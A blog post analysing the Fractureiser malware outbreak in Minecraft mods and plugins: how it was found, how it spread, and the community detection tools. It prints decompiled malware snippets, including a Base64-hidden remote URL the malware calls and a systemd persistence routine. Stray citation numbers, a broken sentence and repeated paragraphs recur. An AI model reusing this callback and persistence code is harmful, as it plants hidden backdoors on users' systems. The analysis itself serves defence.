The Devastating Fractureiser: Minecraft's Malware Outbreak

In Minecraft, a new threat has emerged A malware known as the "Fractureiser" has been causing havoc, infecting mods and spreading. This blog post aims to shed light on this devastating outbreak, providing an in-depth analysis of the malware, its impact, and the steps taken by the community to combat it.

The Emergence of Fractureiser

The Fractureiser malware was first discovered when a Minecraft server hosting company, MCHost.no, was contacted by a customer reporting that his server was not starting correctly. The server would freeze when loading the plugins, a symptom that usually indicates a problem with a faulty or incompatible plugin. However, after several days of back and forth, it was discovered that the issue was much more severe. The customer's plugins were infected with a "virus" that he had unknowingly downloaded from a shady 1.

The malware was traced back to a class file named "Updater.Class" found in the infected plugins. The file was encoded and could not be decompiled using standard methods, making it difficult to understand its functionality 1. However, further investigation revealed that the malware connected to a host via an encoded URL 1.

The Fractureiser's Modus Operandi

The Fractureiser malware operates by infecting Minecraft mods and spreading across servers. It uses a class file named "Updater.Class" to infect plugins and then connects to a host via an encoded URL 1. The malware also sets itself up for continued access, making it challenging to remove 1.

The malware was found to be particularly dangerous as it could spread across servers. However, due to the use of Docker containers for hosting Minecraft servers on MCHost.no, each server was isolated, preventing the malware from spreading between servers 1.

The Community's Response

The Minecraft community has taken several steps to combat the Fractureiser malware in response to the outbreak. A detection tool was developed to help users identify if their computer has been infected 2. The tool checks if the user's system is infected and lists the detected files 2. If an infection is found, the user is advised to delete the infected files and run independent malware scanning tools 2.

In addition to the detection tool, a scanning tool was also developed to detect any dormant or other infected mods/Jar files 2. This tool scans for stage 0 vulnerability and can detect any infected Jars 2.

The Impact of the Fractureiser Malware

The impact of the Fractureiser malware has been significant, with several mods being infected and taken down permanently 2. The malware has also infected several Bukkit plugins 2. At the time of detection, the total non-unique downloads for some of the infected mods and plugins were in the hundreds, indicating the widespread nature of the infection 2.

The following code snippets are from the Fractureiser malware and provide insight into how it operates:

This snippet shows how the malware connects to a host via an encoded URL:

HttpURLConnection var2 = (HttpURLConnection)(new URL(new String(Base64.getDecoder().decode("aHR0cDovL2ZpbGVzLnNreXJhZ2UuZGUvdXBkYXRl")))).openConnection();

The malware connects to a host using an encoded URL. The URL is decoded from Base64 format and then used to open a connection. This method allows the malware to hide the URL it connects to, making it harder for security systems to detect and block it.

This snippet shows how the malware sets itself up for continued access:

var0 = new File("/bin/vmd-gnu");
File var1 = new File("/etc/systemd/system/vmd-gnu.service");
String var2 = "[Unit]\\nDescription=vmd-gnu local service\\nAfter=network.target\\nStartLimitIntervalSec=0\\n\\n[Service]\\nType=simple\\nRestart=always\\nRestartSec=1\\nUser=" + System.getProperty("user.name") + "\\nExecStart=/bin/sh -c \\\"java -Dauto=true -jar /bin/vmd-gnu\\\"\\n\\n[Install]\\nWantedBy=multi-user.target";
URL var3 = O.class.getProtectionDomain().getCodeSource().getLocation();
Files.copy((new File(var3.getFile())).toPath(), var0.toPath(), StandardCopyOption.REPLACE_EXISTING);
Files.write(var1.toPath(), var2.getBytes(), new OpenOption[0]);
Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "systemctl enable vmd-gnu"}).waitFor();
Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "systemctl start vmd-gnu"}).waitFor();

The malware sets itself up for continued access by creating a new service in the system. It creates a new file in the "/bin" directory and a new service in the "/etc/systemd/system" directory. The service is configured to restart always, ensuring that the malware remains active even if the system is rebooted or the process is killed. The service runs with the same privileges as the user, allowing it to perform actions on behalf of the user.

The Aftermath

The aftermath of the Fractureiser malware outbreak was intense activity within the Minecraft community. The hosting company, MCHost.no, took immediate steps to block the domain associated with the malware, thereby reducing its potential harm1. The customer whose server was initially infected had to reinstall all plugins and server.jar, but after these steps, the server was no longer connecting to the malicious server 1.

The community also rallied to provide support and solutions. A detection tool was developed and made available to help users identify if their computer had been infected 2. The tool checks if the user's system is infected and lists the detected files 2. If an infection is found, the user is advised to delete the infected files and run independent malware scanning tools 2.

In addition to the detection tool, a scanning tool was also developed to detect any dormant or other infected mods/Jar files 2. This tool scans for stage 0 vulnerability and can detect any infected Jars 2.

Lessons Learned

The Fractureiser malware outbreak has served as a stark reminder of the potential threats that exist in the world of online gaming. It has highlighted the importance of downloading mods and plugins from trusted sources to avoid such issues in the future. The swift response of the Minecraft community in developing detection and scanning tools to combat the malware is commendable. It serves as an example of the power of community collaboration in the face of adversity.

The incident has also underscored the importance of vigilance and proactive measures in maintaining the security of online gaming environments. As the Fractureiser malware has shown, even seemingly harmless activities like downloading a Minecraft mod can have severe consequences without caution.

References

  1. Lars Jørgen Skattebo - Updater.class

  2. CurseForge Support - June 2023 - Infected mods detection tool